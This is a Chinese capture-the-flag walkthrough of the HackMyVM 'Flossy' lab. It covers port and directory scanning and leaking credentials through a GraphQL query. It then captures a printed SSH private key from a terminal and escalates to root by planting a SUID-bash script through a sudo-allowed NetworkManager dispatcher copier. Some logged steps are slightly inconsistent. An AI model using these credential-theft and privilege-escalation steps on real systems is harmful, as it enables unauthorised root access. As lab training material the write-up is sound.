当前位置:   article > 正文

[HackMyVM]靶场Flossy

[HackMyVM]靶场Flossy

难度:Medium

kali:192.168.56.104

靶机:192.168.56.142

端口扫描

  1. ┌──(root㉿kali2)-[~/Desktop]
  2. └─# nmap 192.168.56.142
  3. Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-01 21:01 CST
  4. Nmap scan report for 192.168.56.142
  5. Host is up (0.00018s latency).
  6. Not shown: 998 closed tcp ports (reset)
  7. PORT STATE SERVICE
  8. 22/tcp open ssh
  9. 80/tcp open http
  10. MAC Address: 08:00:27:98:4D:04 (Oracle VirtualBox virtual NIC)
  11. Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds

开了22 80两个端口

浅扫目录

  1. ┌──(root㉿kali2)-[~/Desktop]
  2. └─# gobuster dir -u http://192.168.56.142 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
  3. ===============================================================
  4. Gobuster v3.6
  5. by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
  6. ===============================================================
  7. [+] Url: http://192.168.56.142
  8. [+] Method: GET
  9. [+] Threads: 10
  10. [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
  11. [+] Negative Status codes: 404
  12. [+] User Agent: gobuster/3.6
  13. [+] Extensions: zip,html,txt,php,bak
  14. [+] Timeout: 10s
  15. ===============================================================
  16. Starting gobuster in directory enumeration mode
  17. ===============================================================
  18. /index.html (Status: 200) [Size: 2392]
  19. Progress: 425366 / 1323366 (32.14%)^C
  20. [!] Keyboard interrupt detected, terminating.
  21. Progress: 425604 / 1323366 (32.16%)
  22. ===============================================================
  23. Finished
  24. ===============================================================

只有index.html 0.0

去web看看什么情况

很朴素的界面

查看源码发现是graphql服务,通过发送json到graphql请求数据

没有东西

看一下有没有账号密码

没有找到,把character修改成user看一下

再改成users

好像有东西了,爆破一下id

id=9的时候爆破出来一组账号密码malo/8YdsA3CkiWx968

ssh连接看看

  1. ┌──(root㉿kali2)-[~/Desktop]
  2. └─# ssh malo@192.168.56.142
  3. The authenticity of host '192.168.56.142 (192.168.56.142)' can't be established.
  4. ED25519 key fingerprint is SHA256:TCA/ssXFaEc0sOJl0lvYyqTVTrCpkF0wQfyj5mJsALc.
  5. This host key is known by the following other names/addresses:
  6. ~/.ssh/known_hosts:50: [hashed name]
  7. ~/.ssh/known_hosts:54: [hashed name]
  8. ~/.ssh/known_hosts:55: [hashed name]
  9. ~/.ssh/known_hosts:69: [hashed name]
  10. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
  11. Warning: Permanently added '192.168.56.142' (ED25519) to the list of known hosts.
  12. malo@192.168.56.142's password:
  13. Linux flossy 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.37-1 (2023-07-03) x86_64
  14. The programs included with the Debian GNU/Linux system are free software;
  15. the exact distribution terms for each program are described in the
  16. individual files in /usr/share/doc/*/copyright.
  17. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
  18. permitted by applicable law.
  19. ╭─malo@flossy ~
  20. ╰─$ whoami
  21. malo

拿到shell

malo用户下没有user flag

  1. ╭─malo@flossy ~
  2. ╰─$ ls -al
  3. total 216
  4. drwxr-xr-x 5 malo malo 4096 Apr 1 15:11 .
  5. drwxr-xr-x 4 root root 4096 Oct 6 20:49 ..
  6. -rw------- 1 malo malo 4 Oct 7 10:06 .bash_history
  7. -rw-r--r-- 1 malo malo 220 Oct 6 18:27 .bash_logout
  8. -rw-r--r-- 1 malo malo 3526 Oct 6 18:27 .bashrc
  9. drwxr-xr-x 3 malo malo 4096 Oct 6 20:59 .local
  10. drwxr-xr-x 12 malo malo 4096 Oct 6 20:06 .oh-my-zsh
  11. -rw-r--r-- 1 malo malo 807 Oct 6 18:27 .profile
  12. drwx------ 2 malo malo 4096 Oct 10 18:36 .ssh
  13. -rw-r--r-- 1 malo malo 51798 Apr 1 15:10 .zcompdump-flossy-5.9
  14. -r--r--r-- 1 malo malo 119920 Apr 1 15:10 .zcompdump-flossy-5.9.zwc
  15. -rw------- 1 malo malo 44 Apr 1 15:11 .zsh_history
  16. -rw-r--r-- 1 malo malo 3890 Oct 6 18:27 .zshrc
  17. ╭─malo@flossy ~

sophie用户有user flag,但是没有权限读

  1. ╭─malo@flossy /home/sophie
  2. ╰─$ ls -al
  3. total 56
  4. drwxr-xr-x 5 sophie sophie 4096 Oct 10 19:31 .
  5. drwxr-xr-x 4 root root 4096 Oct 6 20:49 ..
  6. -rw------- 1 root root 370 Oct 10 18:37 .bash_history
  7. -rw-r--r-- 1 sophie sophie 220 Oct 6 20:49 .bash_logout
  8. -rw-r--r-- 1 sophie sophie 3526 Oct 6 20:49 .bashrc
  9. drwxr-xr-x 3 sophie sophie 4096 Oct 6 20:49 .local
  10. -rwxr----- 1 root sophie 962 Oct 6 20:35 network
  11. drwxr-xr-x 12 sophie sophie 4096 Oct 6 20:55 .oh-my-zsh
  12. -rw-r--r-- 1 sophie sophie 807 Oct 6 20:49 .profile
  13. -rw-r--r-- 1 sophie sophie 66 Oct 7 10:18 .selected_editor
  14. drwx------ 2 sophie sophie 4096 Oct 10 18:36 .ssh
  15. -rwxr-xr-x 1 sophie sophie 630 Oct 10 14:23 SSHKeySync
  16. -rwx------ 1 sophie sophie 33 Oct 10 17:24 user.txt
  17. -rw-r--r-- 1 sophie sophie 3890 Oct 6 20:49 .zshrc
  18. ╭─malo@flossy /home/sophie
  19. ╰─$ cat user.txt
  20. cat: user.txt: Permission denied

不过有一个SSHKeySync文件我们可以读取

  1. ─malo@flossy /home/sophie
  2. ╰─$ cat SSHKeySync
  3. #!/bin/bash
  4. # This script must run every minute in pre-prod
  5. send_private_key() {
  6. local user_name="$1"
  7. local key_path="/home/$user_name/.ssh/id_rsa"
  8. local admin_tty="/dev/pts/24"
  9. if [ -f "$key_path" ]; then
  10. if [ -w "$admin_tty" ]; then
  11. cat "$key_path" > "$admin_tty"
  12. else
  13. echo "Error: Unable to write to $admin_tty"
  14. fi
  15. else
  16. echo "Error: The private key for $user_name doesn't exist."
  17. fi
  18. }
  19. while true ; do
  20. USER="sophie"
  21. echo "Sending $USER's private key to a high-privileged TTY for quick testing..."
  22. send_private_key "$USER"
  23. sleep 1m
  24. done

这个脚本会发送 sophie的私钥,但是tty得是/dev/pts/24

目前tty是/dev/pts/0

  1. ╭─malo@flossy /dev/pts
  2. ╰─$ tty
  3. /dev/pts/0

那就连25次ssh吧

搞到第25个终端

  1. ╭─malo@flossy ~
  2. ╰─$ tty
  3. /dev/pts/24
  4. ╭─malo@flossy ~
  5. ╰─$ -----BEGIN OPENSSH PRIVATE KEY-----
  6. b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
  7. NhAAAAAwEAAQAAAYEAlfKkxqQRaakvwCsUmqbXFm0cdI4zkp9UcejsdWhZKbuq+9l8l6tP
  8. Nic4xIoq1S++4Xlj8acA9oJG3yFSgwsBNIaqAJq1zxSpDnzBBpSIqZk2OmkHw8BNBth98D
  9. 3RKB5d1SOq0pNiBk4dtQ/QGgd7S30oHNlqF524Nf4jCJxkMLUk527Ga+cjPmM068DtOZMF
  10. xfY/gWrnjk44tigt4QP4hkmMEtshPps4SF6dm544FYghYs+rgCH9tx+DfUl7ZFLnBviGL9
  11. RzN7yQLUV/BPFod8SPihd/s7bSMGfBvopCWFcueL0xAd22Q7CU1jSg4W6+aSfbCSRND3ik
  12. tz/SsWN2/RR2H+MQxB11J5qvLFxq291B0Znoi5sgARZUihDihjhPyVL0dco2wrQtL6ey2B
  13. edRtX24GejoGuvdqd3/qHi5R35sZ4zcUCEldNwq0aC/b3EU/cmu16nmDuhJZpT2ILj35cr
  14. ng8Faf39ZAeIRFKsyfibnRMxoBwLkWWyEs8h2APLAAAFiGZJHbxmSR28AAAAB3NzaC1yc2
  15. EAAAGBAJXypMakEWmpL8ArFJqm1xZtHHSOM5KfVHHo7HVoWSm7qvvZfJerTzYnOMSKKtUv
  16. vuF5Y/GnAPaCRt8hUoMLATSGqgCatc8UqQ58wQaUiKmZNjppB8PATQbYffA90SgeXdUjqt
  17. KTYgZOHbUP0BoHe0t9KBzZaheduDX+IwicZDC1JOduxmvnIz5jNOvA7TmTBcX2P4Fq545O
  18. OLYoLeED+IZJjBLbIT6bOEhenZueOBWIIWLPq4Ah/bcfg31Je2RS5wb4hi/Ucze8kC1Ffw
  19. TxaHfEj4oXf7O20jBnwb6KQlhXLni9MQHdtkOwlNY0oOFuvmkn2wkkTQ94pLc/0rFjdv0U
  20. dh/jEMQddSearyxcatvdQdGZ6IubIAEWVIoQ4oY4T8lS9HXKNsK0LS+nstgXnUbV9uBno6
  21. Brr3and/6h4uUd+bGeM3FAhJXTcKtGgv29xFP3Jrtep5g7oSWaU9iC49+XK54PBWn9/WQH
  22. iERSrMn4m50TMaAcC5FlshLPIdgDywAAAAMBAAEAAAGAOMcNhJfYbhFdnt7RKPQWyoubND
  23. kqJxFEqPNBIf3WkTpZ9o42Irn/vuogES+eI2Y2WWsdIIITl8PhsRiNhUgz9x8snRj30ccp
  24. cm5jqqmwi8OTaI+fnIwivn5YRZEqsw24iv2774tWGTwX/JjVvB1sHrvv5eifRvz2JR+rRV
  25. XujBDzPdzQrkfxrOxkvAYr7VqR25EwH8GKl3Rf/f19zc+ymaqcqwEld+7PY3vMIwJIi0Km
  26. HaOz9Usppl7864JZAjZvZu+C1hzouj+hXRFLlUZJGIw+N50C+vmaI0Py4ZDwubwisr+QdP
  27. sihk7GJChCzfs00X5BJ54mUf8o8ka7kjCmoh8niXsOtRGTrThX4U6dy29Fj7q/NHXC9JG8
  28. n4j92V3sQJir4b7EKY9C4dwGM2J/lT41DNluj1iAFj+FZgq/a1BOiIGAgLOloJW9NtPN2M
  29. rdqBVbMaP7C2MRpybCSzVb7MOBk4ySynjk9xHoTgLLzQHHhlOBzua5zfiVrfDLt4v5AAAA
  30. wEAL+tJoildf450QGsY3elLbx9TaUw4uW9bH7YfZ+68eV+TbW5bAzQLV6s1g3Lru1oppVS
  31. Uo2G4uPNyAVHVqU5YNKp0W4f2LfRrwYabEnzGyt5BGWBXHrRl16X2KKk3cuJ/Lld0wY5aJ
  32. iDZE8AL8Hkt6IeReFhCR3CMDOjoLasTnS0k+CLRG5/E22bqy5Y/r07eElt1ptdZXUnbILi
  33. 9/TQn0BgMJNbACry7TLYWf11SAW+HlDqvHIait9JJZVvdsCwAAAMEAxWqZ9pKSh1S0riAy
  34. KoQVkuZ5OW27JYZKmJO1MrkwIWO+UXpXyrWCdh2grXLDmli1R688VE07xWg25ygtNR9w2d
  35. UhNYutFu7Mj8IDEVQ3MkQDozdFTNZUmx5cNUKADIbCt88Uwvsw6asQKWuQeyXivLPVkTLI
  36. Vp3MD5e8t2jlt8Bprc52xQ3DG1HqgavwP6KSSDkirflegl/I74MSEAyYJ24JqWDJwwOYqu
  37. YGdU5z4TsMm87m9dITdAYtl3fTvXpzAAAAwQDCce6pgoKJiodd1qNdFQzMMBZeP0SqnWUH
  38. vfNJdcKSgg8wJVEC1nupH8JZNUAuXQSUS0y1vqpVMgtvB/ui4HBiyWFsHLg181vhGy880U
  39. HM28Q6oJt8Pi9yJ7iwMMKws5eoYQlV0pvQsh+I+4dhK/v09DHLQ2iPSbaqAxUcRmkhN0VJ
  40. aK3CMiTLcp06jECr7qKu3wJVsHZf5C36M5H1204Iuah851GpSCbmIZSgSd0BNvQQ2/k5tW
  41. jbk/VAmeosQ0kAAAANc29waGllQGZsb3NzeQECAwQFBg==
  42. -----END OPENSSH PRIVATE KEY-----

然后用私钥登上sophie的ssh

  1. ╭─malo@flossy ~
  2. ╰─$ nano id_rsa
  3. ╭─malo@flossy ~
  4. ╰─$ cat id_rsa
  5. -----BEGIN OPENSSH PRIVATE KEY-----
  6. b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
  7. NhAAAAAwEAAQAAAYEAlfKkxqQRaakvwCsUmqbXFm0cdI4zkp9UcejsdWhZKbuq+9l8l6tP
  8. Nic4xIoq1S++4Xlj8acA9oJG3yFSgwsBNIaqAJq1zxSpDnzBBpSIqZk2OmkHw8BNBth98D
  9. 3RKB5d1SOq0pNiBk4dtQ/QGgd7S30oHNlqF524Nf4jCJxkMLUk527Ga+cjPmM068DtOZMF
  10. xfY/gWrnjk44tigt4QP4hkmMEtshPps4SF6dm544FYghYs+rgCH9tx+DfUl7ZFLnBviGL9
  11. RzN7yQLUV/BPFod8SPihd/s7bSMGfBvopCWFcueL0xAd22Q7CU1jSg4W6+aSfbCSRND3ik
  12. tz/SsWN2/RR2H+MQxB11J5qvLFxq291B0Znoi5sgARZUihDihjhPyVL0dco2wrQtL6ey2B
  13. edRtX24GejoGuvdqd3/qHi5R35sZ4zcUCEldNwq0aC/b3EU/cmu16nmDuhJZpT2ILj35cr
  14. ng8Faf39ZAeIRFKsyfibnRMxoBwLkWWyEs8h2APLAAAFiGZJHbxmSR28AAAAB3NzaC1yc2
  15. EAAAGBAJXypMakEWmpL8ArFJqm1xZtHHSOM5KfVHHo7HVoWSm7qvvZfJerTzYnOMSKKtUv
  16. vuF5Y/GnAPaCRt8hUoMLATSGqgCatc8UqQ58wQaUiKmZNjppB8PATQbYffA90SgeXdUjqt
  17. KTYgZOHbUP0BoHe0t9KBzZaheduDX+IwicZDC1JOduxmvnIz5jNOvA7TmTBcX2P4Fq545O
  18. OLYoLeED+IZJjBLbIT6bOEhenZueOBWIIWLPq4Ah/bcfg31Je2RS5wb4hi/Ucze8kC1Ffw
  19. TxaHfEj4oXf7O20jBnwb6KQlhXLni9MQHdtkOwlNY0oOFuvmkn2wkkTQ94pLc/0rFjdv0U
  20. dh/jEMQddSearyxcatvdQdGZ6IubIAEWVIoQ4oY4T8lS9HXKNsK0LS+nstgXnUbV9uBno6
  21. Brr3and/6h4uUd+bGeM3FAhJXTcKtGgv29xFP3Jrtep5g7oSWaU9iC49+XK54PBWn9/WQH
  22. iERSrMn4m50TMaAcC5FlshLPIdgDywAAAAMBAAEAAAGAOMcNhJfYbhFdnt7RKPQWyoubND
  23. kqJxFEqPNBIf3WkTpZ9o42Irn/vuogES+eI2Y2WWsdIIITl8PhsRiNhUgz9x8snRj30ccp
  24. cm5jqqmwi8OTaI+fnIwivn5YRZEqsw24iv2774tWGTwX/JjVvB1sHrvv5eifRvz2JR+rRV
  25. XujBDzPdzQrkfxrOxkvAYr7VqR25EwH8GKl3Rf/f19zc+ymaqcqwEld+7PY3vMIwJIi0Km
  26. HaOz9Usppl7864JZAjZvZu+C1hzouj+hXRFLlUZJGIw+N50C+vmaI0Py4ZDwubwisr+QdP
  27. sihk7GJChCzfs00X5BJ54mUf8o8ka7kjCmoh8niXsOtRGTrThX4U6dy29Fj7q/NHXC9JG8
  28. n4j92V3sQJir4b7EKY9C4dwGM2J/lT41DNluj1iAFj+FZgq/a1BOiIGAgLOloJW9NtPN2M
  29. rdqBVbMaP7C2MRpybCSzVb7MOBk4ySynjk9xHoTgLLzQHHhlOBzua5zfiVrfDLt4v5AAAA
  30. wEAL+tJoildf450QGsY3elLbx9TaUw4uW9bH7YfZ+68eV+TbW5bAzQLV6s1g3Lru1oppVS
  31. Uo2G4uPNyAVHVqU5YNKp0W4f2LfRrwYabEnzGyt5BGWBXHrRl16X2KKk3cuJ/Lld0wY5aJ
  32. iDZE8AL8Hkt6IeReFhCR3CMDOjoLasTnS0k+CLRG5/E22bqy5Y/r07eElt1ptdZXUnbILi
  33. 9/TQn0BgMJNbACry7TLYWf11SAW+HlDqvHIait9JJZVvdsCwAAAMEAxWqZ9pKSh1S0riAy
  34. KoQVkuZ5OW27JYZKmJO1MrkwIWO+UXpXyrWCdh2grXLDmli1R688VE07xWg25ygtNR9w2d
  35. UhNYutFu7Mj8IDEVQ3MkQDozdFTNZUmx5cNUKADIbCt88Uwvsw6asQKWuQeyXivLPVkTLI
  36. Vp3MD5e8t2jlt8Bprc52xQ3DG1HqgavwP6KSSDkirflegl/I74MSEAyYJ24JqWDJwwOYqu
  37. YGdU5z4TsMm87m9dITdAYtl3fTvXpzAAAAwQDCce6pgoKJiodd1qNdFQzMMBZeP0SqnWUH
  38. vfNJdcKSgg8wJVEC1nupH8JZNUAuXQSUS0y1vqpVMgtvB/ui4HBiyWFsHLg181vhGy880U
  39. HM28Q6oJt8Pi9yJ7iwMMKws5eoYQlV0pvQsh+I+4dhK/v09DHLQ2iPSbaqAxUcRmkhN0VJ
  40. aK3CMiTLcp06jECr7qKu3wJVsHZf5C36M5H1204Iuah851GpSCbmIZSgSd0BNvQQ2/k5tW
  41. jbk/VAmeosQ0kAAAANc29waGllQGZsb3NzeQECAwQFBg==
  42. -----END OPENSSH PRIVATE KEY-----
  43. ╭─malo@flossy ~
  44. ╰─$ ssh -i id_rsa sophie@127.0.0.1
  45. The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
  46. ED25519 key fingerprint is SHA256:TCA/ssXFaEc0sOJl0lvYyqTVTrCpkF0wQfyj5mJsALc.
  47. This host key is known by the following other names/addresses:
  48. ~/.ssh/known_hosts:1: [hashed name]
  49. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
  50. Warning: Permanently added '127.0.0.1' (ED25519) to the list of known hosts.
  51. @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
  52. @ WARNING: UNPROTECTED PRIVATE KEY FILE! @
  53. @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
  54. Permissions 0644 for 'id_rsa' are too open.
  55. It is required that your private key files are NOT accessible by others.
  56. This private key will be ignored.
  57. Load key "id_rsa": bad permissions
  58. sophie@127.0.0.1's password:
  59. chmod: cannot access '600': No such file or directory
  60. ╭─malo@flossy ~
  61. ╰─$ chmod 600 id_rsa
  62. ╭─malo@flossy ~
  63. ╰─$ ssh -i id_rsa sophie@127.0.0.1
  64. Linux flossy 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.37-1 (2023-07-03) x86_64
  65. The programs included with the Debian GNU/Linux system are free software;
  66. the exact distribution terms for each program are described in the
  67. individual files in /usr/share/doc/*/copyright.
  68. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
  69. permitted by applicable law.
  70. ╭─sophie@flossy ~
  71. ╰─$ whoami
  72. sophie

拿到user flag

sudo -l发现network可以提权

  1. ╭─sophie@flossy ~
  2. ╰─$ sudo -l
  3. sudo: unable to resolve host flossy: Temporary failure in name resolution
  4. Matching Defaults entries for sophie on flossy:
  5. env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
  6. User sophie may run the following commands on flossy:
  7. (ALL : ALL) NOPASSWD: /home/sophie/network*

看一下network

  1. ╭─sophie@flossy ~
  2. ╰─$ cat network
  3. #!/bin/bash
  4. connected_ip(){
  5. connection_type=TCP
  6. champ=2
  7. ignores=LISTEN
  8. lsof_args=-ni
  9. port_local="[0-9][0-9][0-9][0-9][0-9]->"
  10. lsof "$lsof_args" | grep $connection_type | grep -v "$ignores" |
  11. awk '{print $9}' | cut -d : -f $champ | sort | uniq |
  12. sed s/"^$port_local"//
  13. }
  14. dispatcher() {
  15. for s in /opt/*; do
  16. if [ -f "$s" ]; then
  17. d="/etc/NetworkManager/dispatcher.d/$(basename $s)"
  18. if [ ! -f "$d" ] || [ "$s" -nt "$d" ]; then
  19. return 0
  20. fi
  21. fi
  22. done
  23. return 1
  24. }
  25. update() {
  26. if [[ -z $(find /opt -type f) ]] ; then
  27. exit 0
  28. else
  29. echo "Updating scripts."
  30. cp /opt/* /etc/NetworkManager/dispatcher.d/
  31. chmod +x /etc/NetworkManager/dispatcher.d/*
  32. echo "Scripts updated."
  33. fi
  34. }
  35. case "${1}" in
  36. ip) connected_ip ;;
  37. disp) dispatcher ; update ;;
  38. *) echo "Usage: ./$0 option" ;;
  39. esac

脚本会将opt目录下的文件复制到/etc/NetworkManager/dispatcher.d/并赋予可执行权限,那就可以写个脚本再opt里面,然后执行disp,就会把它复制到/etc/NetworkManager/dispatcher.d/

  1. ╭─sophie@flossy /etc/NetworkManager/dispatcher.d
  2. ╰─$ echo "chmod u+s /bin/bash" > /opt/SUID_bash
  3. ╭─sophie@flossy /etc/NetworkManager/dispatcher.d
  4. ╰─$ sudo /home/sophie/network disp
  5. sudo: unable to resolve host flossy: Name or service not known
  6. Updating scripts.
  7. Scripts updated.
  8. ╭─sophie@flossy /etc/NetworkManager/dispatcher.d
  9. ╰─$ ls -al
  10. total 32
  11. drwxr-xr-x 5 root root 4096 Oct 31 10:55 .
  12. drwxr-xr-x 7 root root 4096 Oct 6 18:52 ..
  13. -rwxr-xr-x 1 root root 2293 Mar 9 2023 01-ifupdown
  14. drwxr-xr-x 2 root root 4096 Mar 9 2023 no-wait.d
  15. drwxr-xr-x 2 root root 4096 Mar 9 2023 pre-down.d
  16. drwxr-xr-x 2 root root 4096 Mar 9 2023 pre-up.d
  17. -rwxr-xr-x 1 root root 20 Oct 31 10:55 SUID_bash
  18. ╭─sophie@flossy /etc/NetworkManager/dispatcher.d
  19. ╰─$ ./SUID_bash
  20. chmod: changing permissions of '/bin/bash': Operation not permitted

发现没有权限执行,是因为网络配置需要重新加载

  1. ╭─sophie@flossy /etc/NetworkManager/dispatcher.d
  2. ╰─$ ip a 127
  3. 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
  4. link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
  5. inet 127.0.0.1/8 scope host lo
  6. valid_lft forever preferred_lft forever
  7. inet6 ::1/128 scope host
  8. valid_lft forever preferred_lft forever
  9. 2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
  10. link/ether 08:00:27:98:4d:04 brd ff:ff:ff:ff:ff:ff
  11. inet 192.168.56.142/24 brd 192.168.56.255 scope global dynamic enp0s3
  12. valid_lft 365sec preferred_lft 365sec
  13. inet6 fe80::a00:27ff:fe98:4d04/64 scope link
  14. valid_lft forever preferred_lft forever
  15. ╭─sophie@flossy /etc/NetworkManager/dispatcher.d
  16. ╰─$ nmcli con up lo
  17. Connection successfully activated (D-Bus active path: /org/freedesktop/NetworkManager/ActiveConnection/2)
  18. ╭─sophie@flossy /etc/NetworkManager/dispatcher.d
  19. ╰─$ ./mybash
  20. chmod: changing permissions of '/bin/bash': Operation not permitted
  21. ╭─sophie@flossy /etc/NetworkManager/dispatcher.d
  22. ╰─$ bash -p 1
  23. bash-5.2# id
  24. uid=1001(sophie) gid=1001(sophie) euid=0(root) groups=1001(sophie),100(users)
  25. bash-5.2# cat /root/r*
  26. 355cec17306ab25389f376ef4a21422e

成功root

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/从前慢现在也慢/article/detail/801131
推荐阅读
相关标签
  

闽ICP备14008679号